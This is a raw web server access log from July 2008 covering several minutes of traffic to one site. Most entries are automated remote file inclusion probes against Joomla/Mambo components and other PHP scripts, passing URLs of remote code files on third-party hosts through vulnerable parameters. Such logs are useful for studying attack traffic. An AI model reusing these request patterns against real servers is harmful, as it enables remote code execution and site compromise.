64.38.22.250 - - [06/Jul/2008:10:40:08 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:40:09 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:40:11 -0700] "GET /logs/access_080129.log//appserv/main.php?appserv_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:40:11 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:40:11 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:40:27 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:40:27 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:40:29 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:40:29 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:40:29 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:40:29 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:40:29 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:40:29 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:40:30 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:40:30 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:40:32 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:40:32 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:40:34 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:40:34 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
189.100.26.209 - - [06/Jul/2008:10:40:35 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:40:36 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18595 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:40:36 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:40:43 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:40:43 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:40:44 -0700] "GET /logs/index2.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:40:46 -0700] "GET /logs/access_080121.log//includes?vwar_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:40:46 -0700] "GET //includes?vwar_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:40:46 -0700] "GET /logs//includes?vwar_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:40:49 -0700] "GET /logs/index2.php?x=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:40:54 -0700] "GET /index2.php?x=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:40:54 -0700] "GET /index2.php?x=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:40:54 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:40:55 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:41:08 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [06/Jul/2008:10:41:08 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://servitis-web.com/ftdc/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.3.74.226 - - [06/Jul/2008:10:41:23 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.22.112 - - [06/Jul/2008:10:41:38 -0700] "GET /logs/access_071027.log HTTP/1.0" 200 191919 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
90.157.115.140 - - [06/Jul/2008:10:41:51 -0700] "GET /logs/access_080130.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:41:56 -0700] "GET /logs/access_080121.log//includes?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:41:58 -0700] "GET //includes?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.123.123 - - [06/Jul/2008:10:41:58 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.86.123.123 - - [06/Jul/2008:10:41:59 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:42:03 -0700] "GET /logs//includes?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:42:05 -0700] "GET /logs/access_080313.log//appserv/main.php?appserv_root=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:42:12 -0700] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:42:12 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:42:17 -0700] "GET /logs/access_080121.log//includes?vwar_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:42:17 -0700] "GET //includes?vwar_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:42:17 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:42:17 -0700] "GET /logs//includes?vwar_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:42:18 -0700] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:42:19 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:42:57 -0700] "GET /logs/access_080329.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:43:00 -0700] "GET /logs/access_080329.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:10:43:03 -0700] "GET /logs/access_071219.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.160.134.131 - - [06/Jul/2008:10:43:19 -0700] "GET /logs/access_080121.log//includes?vwar_root=http://www.lust24.ch/forum/acp/.../sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.160.134.131 - - [06/Jul/2008:10:43:19 -0700] "GET //includes?vwar_root=http://www.lust24.ch/forum/acp/.../sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.160.134.131 - - [06/Jul/2008:10:43:20 -0700] "GET /logs//includes?vwar_root=http://www.lust24.ch/forum/acp/.../sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.239.0.245 - - [06/Jul/2008:10:43:55 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
216.239.0.245 - - [06/Jul/2008:10:43:55 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
65.55.211.26 - - [06/Jul/2008:10:43:56 -0700] "GET /retreat1/webcam/?D=A HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
218.50.53.168 - - [06/Jul/2008:10:43:56 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.50.53.168 - - [06/Jul/2008:10:43:57 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.50.53.168 - - [06/Jul/2008:10:43:57 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:10:44:10 -0700] "GET /logs//includes?vwar_root=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:10:44:10 -0700] "GET //includes?vwar_root=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:44:17 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.26 - - [06/Jul/2008:10:44:20 -0700] "GET /retreat1/webcam/?D=A HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:44:24 -0700] "GET /logs/access_071225.log//includes?vwar_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:44:29 -0700] "GET /logs/access_071230.log/?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:45:05 -0700] "GET /logs/access_071230.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:45:05 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:45:05 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.29.4.54 - - [06/Jul/2008:10:45:05 -0700] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [06/Jul/2008:10:45:16 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.215 - - [06/Jul/2008:10:45:28 -0700] "GET /logs/access_080313.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:45:45 -0700] "GET /logs///com_cropimage/admin.cropcanvas.php?cropimagedir=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.26 - - [06/Jul/2008:10:45:52 -0700] "GET /minamijewelry/source_images/?D=D HTTP/1.1" 200 2414 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:46:01 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:46:01 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.239.0.245 - - [06/Jul/2008:10:46:02 -0700] "GET /http://chromeaddict.com///administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
216.239.0.245 - - [06/Jul/2008:10:46:02 -0700] "GET /logs/http://chromeaddict.com///administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:46:03 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.112 - - [06/Jul/2008:10:46:07 -0700] "GET /bikes/WeSTOC08/ HTTP/1.0" 200 832 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:46:08 -0700] "GET /logs/access.log/errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:46:08 -0700] "GET /errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:46:08 -0700] "GET /logs/errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:46:08 -0700] "GET /logs/access.log/errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:46:09 -0700] "GET /errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:46:09 -0700] "GET /logs/errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:46:09 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:46:09 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:46:09 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:46:15 -0700] "GET ///components/com_facileforms/facileforms.frame.php?ff_compath=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:46:15 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:46:15 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:46:15 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.160.134.131 - - [06/Jul/2008:10:46:24 -0700] "GET //includes?vwar_root=http://www.lust24.ch/forum/acp/.../sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:46:35 -0700] "GET /logs/access_080121.log//includes?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:46:36 -0700] "GET //includes?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:46:37 -0700] "GET /logs//includes?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.160.134.131 - - [06/Jul/2008:10:46:47 -0700] "GET /logs/access_071225.log//includes?vwar_root=http://www.lust24.ch/forum/acp/.../sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:10:46:57 -0700] "GET //index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 200 18561 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.64.215 - - [06/Jul/2008:10:46:57 -0700] "GET //index.php?option=com_custompages&cpage=http://site-order4.com//sohoadmin/program/modules/site_templates/plugins/alba.txt? HTTP/1.1" 200 18561 "-" "libwww-perl/5.811" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:47:11 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:47:11 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:47:17 -0700] "GET /logs/access_071225.log//includes?vwar_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.50.53.168 - - [06/Jul/2008:10:47:32 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:47:49 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:47:49 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:47:51 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:47:51 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:47:58 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:47:58 -0700] "GET /errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
